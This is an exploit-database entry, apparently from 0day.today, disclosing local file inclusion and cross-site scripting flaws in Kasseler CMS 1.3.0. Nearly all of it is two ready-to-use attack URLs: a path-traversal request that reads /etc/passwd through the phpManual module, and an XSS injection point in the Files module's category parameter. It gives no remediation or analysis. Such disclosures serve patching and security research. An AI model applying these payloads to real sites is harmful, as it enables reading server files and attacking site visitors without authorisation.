id: 3358
date: 07/04/2008
title: Kasseler CMS 1.3.0 (LFI/XSS) Multiple Vulnerabilities
author: Cr@zy_King
cves: 

=====================================================
Kasseler CMS 1.3.0 (LFI/XSS) Multiple Vulnerabilities
=====================================================




Kasseler-Cms (LFI/XSS) Multiple Remote Vulnerabilities

Down : http://www.kasseler-cms.net

LFI : http://127.0.0.1/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd

Xss : http://127.0.0.1/http://www.kasseler-cms.net/index.php?module=Files&do=Category&cid=[XSS] 



#  0day.today [2023-03-24]  #